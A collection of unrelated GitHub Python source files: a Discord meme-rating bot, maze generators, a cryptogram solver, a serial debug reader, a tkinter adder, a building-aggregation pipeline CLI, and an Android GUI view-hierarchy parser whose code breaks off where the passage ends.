{"seq_id":"69882469393","text":"\"\"\"\nauthor: Alex Sutay\nfile: chartle.py\n\"\"\"\n\nimport discord\nfrom Charles_Chortles.data_manage import total_current, add_entry, find_average, add_to_current, scores_str, \\\n    remove_last_input, set_current, AuthorException, get_current\nfrom Charles_Chortles.config import TOKEN\n\nclient = discord.Client()\n\n\n@client.event\nasync def on_message(message):\n    channel = message.channel\n    text = message.content\n    try:\n\n        # if the bot sent the message, ignore it\n        if message.author == client.user:\n            return\n\n        # If the message contains an image, assume it's a meme and set the current user to be rated to the author\n        if len(message.attachments) > 0:\n            set_current(message.author)\n\n        # if the message says \"!help\", send the help message\n        if text == \"!help\":\n            # await channel.send(\"!help - this message\\n!remove - remove the last score\"\n            #                   \"\\ndone - add the current score to the total as an image instance\\n!average - display 
\"\n # \"the Charles Chortle average\\n!total - display a summary of all the images so far\")\n await channel.send(\"Currently under maintenance. Bug me and I might fix this.\")\n\n \"\"\"\n # if the message says \"done\", send the stats\n elif message.content == \"done\":\n total = total_current()\n add_entry()\n average = find_average()\n await channel.send(\"Total score for this image: \"+str(total)+\"\\nAverage score overall: \"+str(average))\n \"\"\"\n\n # if the message says \"!remove\", remove an image instance\n elif text.startswith(\"!remove\"):\n # remove_last_input()\n # await channel.send(\"Removed the most recent score.\")\n await channel.send(\"Currently under maintenance. Bug me and I might fix this.\")\n\n elif message.content == \"!average\":\n average = find_average()\n current = get_current()\n await channel.send(\"The current average score for\" + current + \" is: \"+str(average))\n\n elif message.content == \"!current\":\n current = get_current()\n await channel.send(\"The current user is \" + current)\n\n # if the message starts with \"+\", take that as a command adding to the score\n elif message.content.startswith('+'):\n try:\n message_txt = message.content\n message_txt = message_txt.split(\" \")\n message_txt = message_txt[0]\n score = float(message_txt[1:])\n add_to_current(str(message.author), score)\n await channel.send(str(score) + \" has been added to the score.\")\n except AuthorException as e:\n await channel.send(\"You can't rate your own meme\")\n except Exception as e:\n await channel.send(message.author.mention + \" has caused an error and needs to do better!\")\n await channel.send(\"Error:\" + str(e))\n\n # if the message is \"!total\", print the totals\n elif message.content == \"!total\":\n msg = scores_str()\n if len(msg) > 2000:\n msg = msg[-1999:]\n await channel.send(msg)\n\n except Exception as e:\n await channel.send(\"Uh oh, that did not work. Oops. 
Here's the error, someone should fix it.\")\n        await channel.send(\"Error:\" + str(e))\n\n\n@client.event\nasync def on_ready():\n    print(\"Logged in as\")\n    print(client.user.name)\n    print(client.user.id)\n\n\nclient.run(TOKEN)\n","repo_name":"alex-sutay/discordBots","sub_path":"Charles_Chortles/chartle.py","file_name":"chartle.py","file_ext":"py","file_size_in_byte":3587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
{"seq_id":"1606663876","text":"import random\nimport queue\n\n\nclass Maze:\n    def __init__(self, m=30, n=40, N = 80):\n        if m>N or n>N:\n            exit()\n        self.R = [[False for col in range(N)] for row in range(N)]\n        self.D = [[False for col in range(N)] for row in range(N)]\n        self.v = [[False for col in range(N)] for row in range(N)]\n        self.row = [-1, 0, 1, 0]\n        self.col = [0, -1, 0, 1]\n        self.m = m\n        self.n = n\n\n    def dfs_generate(self, start_dim=(0, 0)):\n        r = start_dim[0]\n        c = start_dim[1]\n        self.dfs(r, c)\n\n    def dfs(self, r, c):\n        d = random.randrange(0, 4)\n        tmp = random.randrange(0, 2)\n        dd = 1 if tmp == 1 else 3\n        self.v[r][c] = True\n        for i in range(4):\n            rr = r + self.row[d]\n            cc = c + self.col[d]\n            if (rr >= 0 and rr < self.m) and (cc >= 0 and cc < self.n) and self.v[rr][cc] == False:\n                # print(\"?\")\n                if d % 2 == 1:\n                    self.R[r][c - (d == 1)] = True\n                else:\n                    self.D[r - (d == 0)][c] = True\n                self.dfs(rr, cc)\n            d = (d + dd) % 4\n\n    # try not to use this, it's awful\n    def bfs_generate(self, start_dim=(0, 0)):\n        q = queue.Queue()\n        q.put(start_dim)\n        have_visited = 0\n        self.v[start_dim[0]][start_dim[1]] = True\n        while have_visited < self.m*self.n:\n            dim = q.get()\n            r = dim[0]\n            c = dim[1]\n            have_visited += 1\n            d = random.randrange(0, 4)\n            tmp = random.randrange(0, 2)\n            dd = 1 if tmp == 1 else 3\n            for i in range(4):\n                rr = r + self.row[d]\n                cc = c + self.col[d]\n                if (rr >= 0 and rr < self.m) and (cc >= 0 and cc < self.n) and self.v[rr][cc] == False:\n                    q.put((rr, cc))\n                    self.v[rr][cc] = True\n                    if d % 2 == 1:\n                        self.R[r][c - (d == 1)] = True\n                    else:\n                        self.D[r - (d == 0)][c] = True\n                d = (d + dd) % 4\n\n    def random_kruskal_generate(self):\n        # the simplest algorithm to realize kruskal\n        dots = []\n        sets = []\n        for i in range(self.m):\n            for j in range(self.n):\n                dots.append((i, j))\n                sets.append(set())\n        random.shuffle(dots)\n        # print(dots)\n        sets_num = 0\n        for dot in dots:\n            r = dot[0]\n            c = dot[1]\n            if self.v[r][c] == False:\n                self.v[r][c] = True\n                sets[sets_num].add((r, c))\n                sets_num += 1\n\n            d = random.randrange(0, 4)\n            tmp = random.randrange(0, 2)\n            dd = 1 if tmp == 1 else 3\n            for i in range(4):\n                rr = r + self.row[d]\n                cc = c + self.col[d]\n                if (rr >= 0 and rr < self.m) and (cc >= 0 and cc < self.n):\n                    tmp = self.not_in_same_set(sets, (r,c), (rr, cc))\n                    # print(tmp)\n                    judge = tmp[0]\n                    # print(judge)\n                    set_num = tmp[1]\n\n                    if judge == True:\n                        continue\n                    pop_item = -1\n                    for i in range(sets_num):\n                        if (rr, cc) in sets[i]:\n                            pop_item = i\n                            sets_num -= 1\n                            break\n                    # merge two set\n                    if pop_item > -1:\n                        sets[set_num] = sets[set_num] | sets[pop_item]\n                        sets.pop(pop_item)\n                    else:\n                        sets[set_num].add((rr, cc))\n\n                    self.v[rr][cc] = True\n                    if d % 2 == 1:\n                        self.R[r][c - (d == 1)] = True\n                    else:\n                        self.D[r - (d == 0)][c] = True\n                d = (d + dd) % 4\n\n    @staticmethod\n    def not_in_same_set(sets, dot1, dot2):\n        num = 0\n        for i in sets:\n            if dot1 in i:\n                if dot2 in i:\n                    return (True, num)\n                else:\n                    return (False, num)\n            num += 1\n        return (False, num)\n\n    def print_console(self):\n        for c in range(self.n):\n            print(\"._\", end=\"\")\n        print(\".\")\n        for r in range(self.m):\n            print(\"|\", end=\"\")\n            for c in range(self.n):\n                if self.D[r][c]:\n                    print(\" \", end=\"\")\n                else:\n                    print(\"_\", end=\"\")\n                if self.R[r][c]:\n                    print(\".\", end=\"\")\n                else:\n                    print(\"|\", end=\"\")\n            
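# Each cell above printed its floor ('_' or ' ') plus its right wall\n            # ('|' or '.'), so a bare print simply ends the row.\n            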
print(\"\")\n\nif __name__ == '__main__':\n a = Maze(5, 5 ,50)\n # a.dfs_generate((20, 15))\n a.random_kruskal_generate()\n a.print_console()","repo_name":"AHEADer/pymaze","sub_path":"renderMaze.py","file_name":"renderMaze.py","file_ext":"py","file_size_in_byte":4993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"17231483072","text":"import string\nimport matplotlib.pyplot as plt\nimport pickle\nimport os\n\n\ndef load_word_dictionary(file_path):\n with open(file_path, 'r') as file:\n return set(word.strip().lower() for word in file.readlines())\n\n\ndef get_letter_frequencies(text):\n frequencies = {}\n for char in text:\n if char.isalpha():\n char_lower = char.lower()\n frequencies[char_lower] = frequencies.get(char_lower, 0) + 1\n return frequencies\n\n\ndef decrypt_cryptogram(cryptogram, frequency_map, word_dict):\n alphabet = string.ascii_lowercase\n sorted_freq = sorted(frequency_map.items(),\n key=lambda x: x[1], reverse=True)\n freq_letters = ''.join(letter for letter, _ in sorted_freq)\n\n def decrypt_letter(letter):\n if letter.isalpha():\n index = freq_letters.find(letter.lower())\n decrypted_letter = alphabet[index] if letter.islower(\n ) else alphabet[index].upper()\n return decrypted_letter\n return letter\n\n decrypted_text = ''.join(decrypt_letter(char) for char in cryptogram)\n words = decrypted_text.split()\n decrypted_words = [word if word.lower(\n ) not in word_dict else word_dict[word.lower()] for word in words]\n return ' '.join(decrypted_words)\n\n\ndef guess_word_length(cryptogram):\n spaces = cryptogram.count(' ')\n return len(cryptogram) // (spaces + 1)\n\n\ndef manual_decryption(decrypted_text, cryptogram):\n print(\"\\nManual Decryption:\")\n while True:\n print(\"Current decrypted text:\", decrypted_text)\n guess = input(\"Enter a letter to replace or press 'Enter' to finish: \")\n if not guess:\n break\n replacement = input(f\"Enter the replacement for '{guess}': \")\n decrypted_text = decrypted_text.replace(guess, replacement)\n return decrypted_text\n\n\ndef visualize_frequency(frequency_map):\n sorted_freq = sorted(frequency_map.items(),\n key=lambda x: x[1], reverse=True)\n letters, frequencies = zip(*sorted_freq)\n plt.bar(letters, frequencies)\n plt.xlabel('Letters')\n plt.ylabel('Frequency')\n plt.title('Letter Frequency in the Cryptogram')\n plt.show()\n\n\ndef save_progress(decrypted_text):\n with open('progress.pickle', 'wb') as file:\n pickle.dump(decrypted_text, file)\n\n\ndef load_progress():\n if os.path.exists('progress.pickle'):\n with open('progress.pickle', 'rb') as file:\n return pickle.load(file)\n else:\n return None\n\n\nif __name__ == '__main__':\n cryptogram = input(\"Enter the cryptogram: \")\n word_dict_path = input(\"Enter the path to the word dictionary file: \")\n\n word_dictionary = load_word_dictionary(word_dict_path)\n\n letter_frequencies = get_letter_frequencies(cryptogram)\n decrypted_message = load_progress() or decrypt_cryptogram(\n cryptogram, letter_frequencies, word_dictionary)\n\n print(\"\\nOriginal cryptogram:\", cryptogram)\n print(\"Decrypted message:\", decrypted_message)\n\n word_length_guess = guess_word_length(cryptogram)\n print(f\"Guessed word length: {word_length_guess}\")\n\n visualize_frequency(letter_frequencies)\n\n decrypted_message = manual_decryption(decrypted_message, cryptogram)\n print(\"\\nFinal decrypted message:\", decrypted_message)\n\n 
save_progress(decrypted_message)\n","repo_name":"avinashkranjan/Amazing-Python-Scripts","sub_path":"Cryptogram Solver/cryptogram_solver.py","file_name":"cryptogram_solver.py","file_ext":"py","file_size_in_byte":3314,"program_lang":"python","lang":"en","doc_type":"code","stars":1608,"dataset":"github-code","pt":"83"} +{"seq_id":"5821786201","text":"from datetime import datetime\n\nimport serial\n\nser = serial.Serial('COM3', baudrate=9600)\n\nser.flushInput()\nprintdate = True\n\n\nwhile True:\n try:\n char = (ser.read(1)).decode('ascii')\n if printdate:\n print(datetime.now(), end=\"\\t\")\n printdate = False\n\n if char == '\\n':\n printdate = True\n print(char, end=\"\")\n except serial.SerialException:\n ser = serial.Serial('COM3', baudrate=9600)\n continue\n\n","repo_name":"walczakp/xbox360-flasher","sub_path":"debug.py","file_name":"debug.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"83"} +{"seq_id":"69882469393","text":"import unittest\n\n\nfrom adept.pipeline import Pipeline\n\n\nclass PipelineTest(unittest.TestCase):\n \n def setUp(self):\n self.pipeline = Pipeline()\n\n def test_pipeline(self): \n text = \"Herbs to 40-100 cm tall, annual, much branched. 2 ovaries. 56 stamenoids. Seed volume is about 2 cm³.\" \n fields = self.pipeline(text, 'angiosperm')\n print(fields.to_template())\n \n ASSETS_DATA_DIR / 'fields.tpl.yml'\n\n\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"NaturalHistoryMuseum/ADEPT","sub_path":"test/pipeline_test.py","file_name":"pipeline_test.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"32200805992","text":"import tkinter as tk\nimport ctypes\nimport re\n\n# ボタンを選択した場合に、実行される関数\ndef calcAns():\n # entry Widget内へ入力された数字を取得する。\n tmpNumArea1 = numArea1.get()\n tmpNumArea2 = numArea2.get()\n\n # entry Widget内へ数字が入力されなかった場合は、計算しない。\n if not tmpNumArea1 == '' and not tmpNumArea2 == '':\n # label Widgetのtextを再設定(計算結果を書き換え)する。\n # text : テキスト情報\n ansLabel.configure(text=int(tmpNumArea1)+int(tmpNumArea2))\n\n# 入力制限について : https://kuroro.blog/python/YaHEdMd4ScGvrU44zdT6/\ndef onValidate(S):\n # 入力された文字が半角数字の場合\n # reについて : https://note.nkmk.me/python-re-match-search-findall-etc/\n if re.match(re.compile('[0-9]+'), S):\n return True\n else:\n # 入力不正のブザーを鳴らす。\n root.bell()\n return False\n\n# Windowを生成する。\n# Windowについて : https://kuroro.blog/python/116yLvTkzH2AUJj8FHLx/\nroot = tk.Tk()\n# Windowへタイトルをつける。\nroot.title('pythonで足し算')\n# Windowの画面サイズを設定する。\n# geometryについて : https://kuroro.blog/python/rozH3S2CYE0a0nB3s2QL/\nroot.geometry('400x125')\n\n# register : 入力制限を行うための関数の登録を行う。パラメータと関数を紐づけるために必要。\n# 入力制限について : https://kuroro.blog/python/YaHEdMd4ScGvrU44zdT6/\nvcmd = root.register(onValidate)\n\n# Windowを親要素として、label Widgetを作成する。\n# text : テキスト情報\n# font : 文字の大きさや形式を変更する。\n# fontについて : https://kuroro.blog/python/RZNjLl36upkumxwkTRWl/\n# Labelについて : https://kuroro.blog/python/Pj4Z7JBNRvcHZvtFqiKD/\nplusLabel = tk.Label(master=root, text='+', font=100)\n# Windowを親要素として、label Widgetをどのように配置するのか?\n# placeについて : https://kuroro.blog/python/JyaHUKyFyxCa0baFfXg0/\nplusLabel.place(x=141, y=20)\n\n# Windowを親要素として、entry Widgetを作成する。\n# width : 幅の設定\n# font : 文字の大きさや形式を変更する。\n# fontについて : https://kuroro.blog/python/RZNjLl36upkumxwkTRWl/\n# validate : 入力制限するオプションの値を設定。\n# validatecommand : 入力制限用関数の設定。\n# 入力制限について : https://kuroro.blog/python/YaHEdMd4ScGvrU44zdT6/\n# 
Entryについて : https://kuroro.blog/python/PUZp77YFxrXvMCjpZbUg/\nnumArea1 = tk.Entry(master=root, width=5, font=40, validate=\"key\", validatecommand=(vcmd, '%S'))\n# Windowを親要素として、entry Widgetをどのように配置するのか?\n# placeについて : https://kuroro.blog/python/JyaHUKyFyxCa0baFfXg0/\nnumArea1.place(x=60, y=20)\n\n# Windowを親要素として、entry Widgetを作成する。\n# width : 幅の設定\n# font : 文字の大きさや形式を変更する。\n# fontについて : https://kuroro.blog/python/RZNjLl36upkumxwkTRWl/\n# validate : 入力制限するオプションの値を設定。\n# validatecommand : 入力制限用関数の設定。\n# 入力制限について : https://kuroro.blog/python/YaHEdMd4ScGvrU44zdT6/\n# Entryについて : https://kuroro.blog/python/PUZp77YFxrXvMCjpZbUg/\nnumArea2 = tk.Entry(master=root, width=5, font=40, validate=\"key\", validatecommand=(vcmd, '%S'))\n# Windowを親要素として、entry Widgetをどのように配置するのか?\n# placeについて : https://kuroro.blog/python/JyaHUKyFyxCa0baFfXg0/\nnumArea2.place(x=180, y=20)\n\n# Windowを親要素として、button Widgetを作成する。\n# text : テキスト情報\n# command : ボタンを選択した場合に、実行する関数を設定する。calcAnsとする。\n# font : 文字の大きさや形式を変更する。\n# fontについて : https://kuroro.blog/python/RZNjLl36upkumxwkTRWl/\n# Buttonについて : https://kuroro.blog/python/oFju6EngDtcYtIiMIDf1/\nansBtn = tk.Button(master=root, text='足し算', command=calcAns, font=40)\n# Windowを親要素として、button Widgetをどのように配置するのか?\n# placeについて : https://kuroro.blog/python/JyaHUKyFyxCa0baFfXg0/\nansBtn.place(x=300, y=20)\n\n# Windowを親要素として、label Widgetを作成する。\n# width : 幅の設定\n# font : 文字の大きさや形式を変更する。\n# fontについて : https://kuroro.blog/python/RZNjLl36upkumxwkTRWl/\n# background : 背景色を設定\n# 色について : https://kuroro.blog/python/YcZ6Yh4PswqUzaQXwnG2/\n# Labelについて : https://kuroro.blog/python/Pj4Z7JBNRvcHZvtFqiKD/\nansLabel = tk.Label(master=root, width=5, font=40, background='green')\n# Windowを親要素として、label Widgetをどのように配置するのか?\n# placeについて : https://kuroro.blog/python/JyaHUKyFyxCa0baFfXg0/\nansLabel.place(x=60, y=80)\n\ntry:\n ctypes.windll.shcore.SetProcessDpiAwareness(True)\nexcept:\n pass\n\n# Windowをループさせて、継続的にWindow表示させる。\n# mainloopについて : https://kuroro.blog/python/DmJdUb50oAhmBteRa4fi/\nroot.mainloop()\n","repo_name":"kuroroblog/tkinter-calclate-plus","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5106,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"5606301059","text":"import argparse\nimport os\nimport sys\nfrom pathlib import Path\n\n# Add common directory to sys.path\nfrom novelt.lib.thread_utils import run_process_stream_output\n\nCOMMON_DIR = Path(__file__).parent.parent.parent.parent / 'src'\nassert COMMON_DIR.exists()\nsys.path.append(str(COMMON_DIR))\n\nfrom novelt.lib.gdm_utils import run_step, run_gdm, init_log\n\n\ndef gdm_process(start_step, end_step, args):\n\n\n init_log(cfg)\n\n current_step_num = 0\n\n step_list = [\n steps.print_input_info,\n\n steps.step_fix_year1_input,\n\n steps.step_rasterize_year1_input,\n steps.step_rasterize_year2_input,\n\n steps.step_create_new_database,\n\n steps.step_squares_to_database,\n\n steps.step_export_csvs\n\n ]\n\n for step_fn in step_list:\n current_step_num = run_step(cfg, current_step_num, start_step, end_step, step_fn)\n return current_step_num\n\n\n# ------------------------------------------------------------\n# Main program\n# ------------------------------------------------------------\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Aggregates building footprints into settlement extents')\n\n parser.add_argument('--clean', action='store_true',\n help='If set, will set clean flag. 
This will remove any output for a given step.')\n\n parser.add_argument(\"start_step\", type=int, nargs=\"?\", default=1, help=\"Which step to start running, defaults to 1\")\n parser.add_argument(\"stop_step\", type=int, nargs=\"?\", help=\"Stop executing after running this step\")\n parser.add_argument(\"--group-distance\", type=float, nargs=\"?\", default=0.0008333,\n help=\"How far apart in the reference raster CRS should buildings be considered part of the same settlement\"\n )\n\n parser.add_argument(\"--country\", type=str, help=\"3 letter country ISO code\", required=True)\n\n parser.add_argument(\"--contour-value\", type=int, default=12, nargs=\"?\", help=\"In contour step that draws a contour around dense building squares in the building count raster, defines how many buildings must be in these squares\")\n\n parser.add_argument(\"--contour-min-area\", type=int, default=400000, nargs=\"?\", help=\"Area in square meters of how large the contour area must be to consider a settlement a BUA\")\n\n parser.add_argument('--gen-docs', action='store_true', help=\"If set will generate step documentation\")\n\n parser.add_argument(\"--chunk-rows\", type=int, default=10, nargs=\"?\", help=\"When buildings are split into square chunks, how many rows. Defaults to 10. Increase if a building related step fails due to memory/timeout issues.\")\n parser.add_argument(\"--chunk-cols\", type=int, default=10, nargs=\"?\", help=\"When buildings are split into square chunks, how many columns\")\n\n parser.add_argument(\"--log-level\", type=str, default=\"warn\",\n help=\"Error/Warn/Info/Debug/Trace\")\n\n args = parser.parse_args()\n\n # Given script parameters\n start_step = args.start_step\n\n if not args.stop_step:\n args.stop_step = args.start_step\n\n end_step = args.stop_step\n\n os.environ[\"COUNTRY_CODE\"] = args.country.upper()\n\n if args.gen_docs:\n os.environ[\"GDM_GENERATE_DOCS\"] = \"true\"\n start_step = 1\n end_step = 999\n\n # Import here only after the COUNTRY_CODE has been set because the config will depend on the country code passed in\n from config import Config as cfg\n import steps\n\n # set the values from config that were passed in by command line\n cfg.CLEAN = args.clean\n cfg.GROUP_DISTANCE = args.group_distance\n cfg.CONTOUR_VALUE = args.contour_value\n cfg.CONTOUR_MIN_BUA_AREA = args.contour_min_area\n cfg.CHUNK_ROWS = args.chunk_rows\n cfg.CHUNK_COLS = args.chunk_cols\n cfg.LOG_LEVEL = args.log_level\n\n gdm_process(start_step, end_step, args)\n\n if args.gen_docs:\n run_process_stream_output(f\"\"\"mkdir -p \"{cfg.MODULE_DIR / 'docs'}\" \"\"\")\n doc_output_path = cfg.MODULE_DIR / \"docs\" / \"bldg_agg_script_steps.html\"\n run_process_stream_output(f\"\"\"pandoc --from gfm --to html --standalone --output \"{doc_output_path}\" --metadata pagetitle=\"Building Aggregration Steps\" \"{cfg.MODULE_DIR}/working/doc.md\" \"\"\")\n\n print(f\"Documentation generated in {doc_output_path}\")","repo_name":"novelt/building-aggregation-tool","sub_path":"modules/ID_SET_CMP/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4300,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"83"} +{"seq_id":"1386767045","text":"import os\nimport cv2\nimport json\nfrom os.path import join as pjoin\nimport copy\n\nfrom utils.classification.IconClassifier import IconClassifier\nfrom utils.classification.IconCaption import IconCaption\nfrom utils.ocr.text_detection import text_detection\n\nimport sys\nimport 
warnings\nsys.path.append('../utils/classification')\nwarnings.filterwarnings(\"ignore\", category=Warning)\n\n\nclass GUI:\n def __init__(self, gui_img_file, gui_json_file, output_file_root='data/twitter/testcase1',\n resize=(1080, 2280), model_icon_caption=None, model_icon_classification=None):\n self.img_file = gui_img_file\n self.json_file = gui_json_file\n self.gui_no = gui_img_file.replace('/', '\\\\').split('\\\\')[-1].split('.')[0]\n\n self.resize = resize\n self.img = cv2.resize(cv2.imread(gui_img_file), resize) # resize the image to be consistent with the vh\n self.json = json.load(open(gui_json_file, 'r', encoding='utf-8')) # json data, the view hierarchy of the GUI\n\n self.element_id = 0\n self.elements = [] # list of element in dictionary {'id':, 'class':...}\n self.elements_leaves = [] # leaf nodes that does not have children\n self.element_tree = None # structural element tree, dict type\n self.blocks = [] # list of blocks from element tree\n self.removed_node_no = 0 # for the record of the number of removed nodes\n\n self.ocr_text = [] # GUI ocr detection result, list of texts {}\n self.model_icon_caption = model_icon_caption # IconCaption\n self.model_icon_classification = model_icon_classification # IconClassification\n\n # output file paths\n self.output_dir = pjoin(output_file_root, 'guidata')\n os.makedirs(self.output_dir, exist_ok=True)\n self.output_file_path_elements = pjoin(self.output_dir, self.gui_no + '_elements.json')\n self.output_file_path_element_tree = pjoin(self.output_dir, self.gui_no + '_tree.json')\n\n def load_elements(self, file_path_elements=None, file_path_element_tree=None):\n if not file_path_elements: file_path_elements = self.output_file_path_elements\n if not file_path_element_tree: file_path_element_tree = self.output_file_path_element_tree\n\n if not os.path.exists(file_path_elements) or not os.path.exists(file_path_element_tree):\n print('Loading FAILED, No such file:', file_path_elements, file_path_element_tree)\n\n print('Load elements from', file_path_elements)\n self.elements = json.load(open(file_path_elements, 'r', encoding='utf-8')) # => self.elements\n self.gather_leaf_elements() # => self.elements_leaves\n self.element_id = self.elements[-1]['id'] + 1 # => self.element_id\n print('Load element tree from', file_path_element_tree)\n self.element_tree = json.load(open(file_path_element_tree, 'r', encoding='utf-8')) # => self.element_tree\n\n '''\n **************************\n *** UI Info Extraction ***\n **************************\n '''\n def ui_info_extraction(self, remove_top_bottom_bars=True):\n '''\n Extract elements from raw view hierarchy Json file and store them as dictionaries\n => self.elements; self.elements_leaves\n '''\n # print('--- Extract elements from VH ---')\n json_cp = copy.deepcopy(self.json)\n element_root = json_cp['activity']['root']\n element_root['class'] = 'root'\n # clean up the json tree to remove redundant layout node\n self.prone_invalid_children(element_root, remove_bars=remove_top_bottom_bars)\n self.remove_redundant_nesting(element_root)\n self.merge_element_with_single_leaf_child(element_root)\n self.extract_children_elements(element_root, 0)\n self.revise_elements_attrs()\n self.gather_leaf_elements()\n # json.dump(self.elements, open(self.output_file_path_elements, 'w', encoding='utf-8'), indent=4)\n # print('Save elements to', self.output_file_path_elements)\n\n def prone_invalid_children(self, element, remove_bars=True):\n '''\n Prone invalid children elements\n Leave valid children and prone 
their children recursively\n Take invalid children's children as its own directly\n (Optional) Remove top and bottom bars\n '''\n def check_if_element_valid(ele, min_length=5):\n '''\n Check if the element is valid and should be kept\n '''\n if (ele['bounds'][0] >= ele['bounds'][2] - min_length or ele['bounds'][1] >= ele['bounds'][3] - min_length) or \\\n ('layout' in ele['class'].lower() and not ele['clickable']):\n return False\n return True\n\n valid_children = []\n if 'children' in element:\n for child in element['children']:\n # remove bars\n if remove_bars:\n screen_height, screen_width = self.img.shape[:2]\n bounds = child['bounds']\n width = bounds[2] - bounds[0]\n if width / screen_width > 0.95 and \\\n ((bounds[1] / screen_height > 0.9 and bounds[3] == screen_height) or (bounds[3] / screen_height < 0.05 and bounds[1] == 0)):\n continue\n # check invalid elements\n if check_if_element_valid(child):\n valid_children.append(child)\n self.prone_invalid_children(child)\n else:\n valid_children += self.prone_invalid_children(child)\n self.removed_node_no += 1\n element['children'] = valid_children\n return valid_children\n\n def remove_redundant_nesting(self, element):\n '''\n Remove redundant parent node whose bounds are same\n '''\n if 'children' in element and len(element['children']) > 0:\n redundant = False\n new_children = []\n for child in element['children']:\n # inherit clickability\n if element['clickable']:\n child['clickable'] = True\n # recursively inspect child node\n new_children += self.remove_redundant_nesting(child)\n if child['bounds'] == element['bounds']:\n redundant = True\n # only return the children if the node is redundany\n if redundant:\n self.removed_node_no += 1\n return new_children\n else:\n element['children'] = new_children\n return [element]\n\n def merge_element_with_single_leaf_child(self, element):\n '''\n Keep the resource-id and class and clickable of the child element\n '''\n if 'children' in element:\n if len(element['children']) == 1 and 'children' not in element['children'][0]:\n child = element['children'][0]\n element['resource-id'] = child['resource-id'] if 'resource-id' in child else ''\n element['class'] = child['class']\n element['clickable'] = child['clickable']\n self.removed_node_no += 1\n del element['children']\n else:\n new_children = []\n for child in element['children']:\n new_children.append(self.merge_element_with_single_leaf_child(child))\n element['children'] = new_children\n return element\n\n def extract_children_elements(self, element, layer):\n '''\n Recursively extract children from an element\n '''\n element['id'] = self.element_id\n element['layer'] = layer\n self.elements.append(element)\n children_depth = layer # record the depth of the children\n if 'children' in element and len(element['children']) > 0:\n element['children-id'] = []\n for child in element['children']:\n self.element_id += 1\n element['children-id'].append(self.element_id)\n children_depth = max(children_depth, self.extract_children_elements(child, layer+1))\n element['children-depth'] = children_depth\n # replace wordy 'children' with 'children-id'\n del element['children']\n if 'ancestors' in element:\n del element['ancestors']\n return children_depth\n\n def revise_elements_attrs(self):\n '''\n Revise some attributes in elements\n 1. add \"area\"\n 2. 
keep \"content-desc\" as a string\n '''\n for ele in self.elements:\n bounds = ele['bounds']\n ele['area'] = {'height': int(bounds[2] - bounds[0]), 'length': int(bounds[3] - bounds[1])}\n if 'content-desc' in ele and type(ele['content-desc']) == list:\n if not ele['content-desc'][0]:\n ele['content-desc'] = ''\n else:\n ele['content-desc'] = ','.join(ele['content-desc'])\n\n def gather_leaf_elements(self):\n i = 0\n for ele in self.elements:\n if 'children-id' not in ele:\n ele['leaf-id'] = i\n self.elements_leaves.append(ele)\n i += 1\n\n '''\n *******************\n *** UI Analysis ***\n *******************\n '''\n def ui_analysis_elements_description(self, ocr=True, caption=True, cls=True):\n '''\n Extract description for UI elements through 'text', 'content-desc', 'classification' and 'caption'\n => element['description']\n '''\n # print('--- Analyze UI elements ---')\n # use ocr to detect text\n if ocr: self.ocr_detect_gui_text()\n # generate caption for non-text elements\n if caption: self.caption_elements()\n # classify non-text elements\n if cls: self.classify_elements()\n # extract element description from 'text', 'content-desc', 'icon-cls' and 'caption'\n for ele in self.elements_leaves:\n description = ''\n # check text\n if 'text' in ele and len(ele['text']) > 0:\n description += ele['text']\n # check content description\n if 'content-desc' in ele and len(ele['content-desc']) > 0 and ele['content-desc'] != ele['text']:\n description = ele['content-desc'] if len(description) == 0 else description + ' / ' + ele['content-desc']\n # if no text and content description, check caption\n if len(description) == 0:\n if 'icon-cls' in ele and ele['icon-cls']:\n description = ele['icon-cls']\n elif 'caption' in ele and '' not in ele['caption']:\n description = ele['caption']\n else:\n description = None\n ele['description'] = description\n # save the elements with 'description' attribute\n json.dump(self.elements, open(self.output_file_path_elements, 'w', encoding='utf-8'), indent=4)\n # print('Save elements to', self.output_file_path_elements)\n\n def ocr_detect_gui_text(self):\n scale_w = self.resize[0] / self.img.shape[1]\n scale_h = self.resize[1] / self.img.shape[0]\n\n def scale_text_bounds(bounds):\n return [bounds[0] * scale_w, bounds[1] * scale_h,\n bounds[2] * scale_w, bounds[3] * scale_h]\n\n def match_text_and_element(ele):\n '''\n Match ocr text and element through iou\n '''\n for text in self.ocr_text:\n t_b, e_b = text['bounds'], ele['bounds']\n # calculate intersected area between text and element\n intersected = max(0, min(t_b[2], e_b[2]) - max(t_b[0], e_b[0])) * max(0, min(t_b[3], e_b[3]) - max(t_b[1], e_b[1]))\n if intersected > 0:\n ele['ocr'] = ' '.join([ele['ocr'], text['content']])\n ele['text'] = ' '.join([ele['text'], text['content']])\n\n # google ocr detection for the GUI image\n self.ocr_text = text_detection(self.img_file)\n for t in self.ocr_text:\n t['bounds'] = scale_text_bounds(t['bounds'])\n\n # merge text to elements according to position\n for element in self.elements_leaves:\n if 'text' not in element or element['text'] == '':\n element['ocr'] = ''\n element['text'] = ''\n match_text_and_element(element)\n\n def caption_elements(self, elements=None):\n if self.model_icon_caption is None:\n self.model_icon_caption = IconCaption(vocab_path='../utils/classification/model_results/vocab_idx2word.json',\n model_path='../utils/classification/model_results/labeldroid.pt')\n elements = self.elements_leaves if elements is None else elements\n clips = []\n for ele 
